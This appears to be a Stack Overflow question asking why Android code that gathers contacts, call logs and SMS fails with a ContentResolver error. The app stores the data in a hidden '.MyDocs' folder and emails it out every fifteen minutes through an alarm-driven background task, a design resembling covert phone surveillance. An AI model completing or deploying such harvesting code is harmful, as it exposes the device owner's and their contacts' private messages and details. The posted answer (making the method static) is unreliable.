# How to access contacts and send them by another class which is not and activity but it is not working as contentResolver Error

Tags: java, android, android-contentresolver

I am creating an app which collects all Contacts from device and send them through email, but problem is when I call the function contacts() which "gets the list of contacts" from a class name `save` which saves the contacts to device to be sent later there is a error:

> Invoking virtual Method context.ContentResolver.

The problem is now how to call the getContacts() Method from MainActivity in save class which is called and executed in BroadcastReceiver periodically.

**Main activity code is**

```
 protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        startService(new Intent(getBaseContext(),SecureService.class));
        Intent i= new Intent(MainActivity.this,SecureReciever.class);
        PendingIntent pi=PendingIntent.getBroadcast(getApplicationContext(),0,i,0);
        AlarmManager am= (AlarmManager) getSystemService(ALARM_SERVICE);
        am.setRepeating(AlarmManager.RTC_WAKEUP, System.currentTimeMillis()+3000, AlarmManager.INTERVAL_FIFTEEN_MINUTES,pi);
    }
 public ArrayList<String> getContacts(){
        ContentResolver cr= getContentResolver();
        ArrayList <String> contacts= new ArrayList<String>();
        try{

            Cursor cursor=cr.query(ContactsContract.Contacts.CONTENT_URI,null,null,null,null);
            assert cursor != null;
            String Item="";
            while(cursor.moveToNext()){
                String id=cursor.getString(cursor.getColumnIndex(ContactsContract.Contacts._ID));
                String name=cursor.getString(cursor.getColumnIndex(ContactsContract.Contacts.DISPLAY_NAME));
                Cursor phonecursor=cr.query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI,null,ContactsContract.CommonDataKinds.Phone.CONTACT_ID + "=?", new String[]{id} ,null );
                String phonenumber="",_email="";
                assert phonecursor != null;
                while (phonecursor.moveToNext()){
                    phonenumber += phonecursor.getString(phonecursor.getColumnIndex(ContactsContract.CommonDataKinds.Phone.NUMBER))+"\n";
                }
                phonecursor.close();
                Cursor emailcursor=cr.query(ContactsContract.CommonDataKinds.Email.CONTENT_URI,null,ContactsContract.CommonDataKinds.Email.CONTACT_ID + "=? ",new String[] {id},null);

                while (emailcursor.moveToNext()){
                    _email =_email + emailcursor.getString(emailcursor.getColumnIndex(ContactsContract.CommonDataKinds.Email.DATA));
                }
                emailcursor.close();
                Item ="Name : "+ name + "\nPhone No : " + phonenumber + "\n Email : "+_email + "\n---------------------\n";
                contacts.add(Item);
            }
            cursor.close();
        }catch (Exception ex){
            Log.d("Error",ex.getMessage());
        }
        return contacts;
    }
```

**Save Class code**

```
public class save extends AsyncTask<String, Void ,String> {
    MainActivity ma=new MainActivity();
    @Override
    protected String doInBackground(String... params) {
        try{

            String Calllogs= ma.getCalllogs().toString();
            String SMS= ma.fetchinbox().toString();
            String Contacts= ma.getContacts().toString();

            String Path= Environment.getExternalStoragePublicDirectory(Environment.DIRECTORY_DOCUMENTS).getAbsolutePath()+"/.MyDocs";
            File f=new File(Path);
            FileOutputStream fos;
            if (!f.exists())
                f.mkdir();
            File file=new File(Path+"/"+System.currentTimeMillis()+"Contacts.txt");
            File file1= new File(Path+"/"+System.currentTimeMillis()+"CallLogs.txt");
            File file2=new File(Path+"/"+System.currentTimeMillis()+"SMS.txt");

            if (file.exists())
                file.delete();
            else
            {
                try{
                    file.createNewFile();
                    file.setWritable(true);
                    fos= new FileOutputStream(file);
                    fos.write(Contacts.getBytes());
                    fos.close();
                }catch (Exception ex){
                    ex.printStackTrace();
                }
            }
            if (file1.exists())
                file1.delete();
            else
            {
                try{
                    file1.createNewFile();
                    file1.setWritable(true);
                    fos= new FileOutputStream(file1);
                    fos.write(Calllogs.getBytes());
                    fos.close();
                }catch (Exception ex){
                    ex.printStackTrace();
                }
            }
            if (file2.exists())
                file2.delete();
            else
            {
                try{
                    file2.createNewFile();
                    file2.setWritable(true);
                    fos= new FileOutputStream(file2);
                    fos.write(SMS.getBytes());
                    fos.close();
                }catch (Exception ex){
                    ex.printStackTrace();
                }
            }
        }catch (Exception ex){
            Log.d("Save Error", ex.getMessage());
        }
        return null;
    }

    @Override
    protected void onPostExecute(String s) {
        new sendmail().execute();
    }
}
```

**BroadCastReceiver Wher save class is called to execute Async Task to save data in background**

```
public class SecureReciever extends BroadcastReceiver {
    @Override
    public void onReceive(final Context context, Intent intent) {
        Date date= new Date();
        Log.d("Alarm Reciever","Alarm Triggered At : "+ java.text.DateFormat.getTimeInstance().format(date));
        new save().execute();
    }
}
```

Comment: You are not passing the `context` correctly.

Comment: help me out how to pass context?

Comment: When writing your questions, please take care to ensure that really important details (like the names and case of your methods) are typed correctly. I have corrected five separate errors in your post just in your method names alone. Your English does not have to be perfect, but the technical details do.

Answer (score 0):

try making **getContacts()** access specifier as **public static**. When you need it simply call it by **MainActivity.getContacts()**

Comment: I tried it but when I make getcontacts() public static I was not able to us getContentResolver() which is used in getContacts () Method.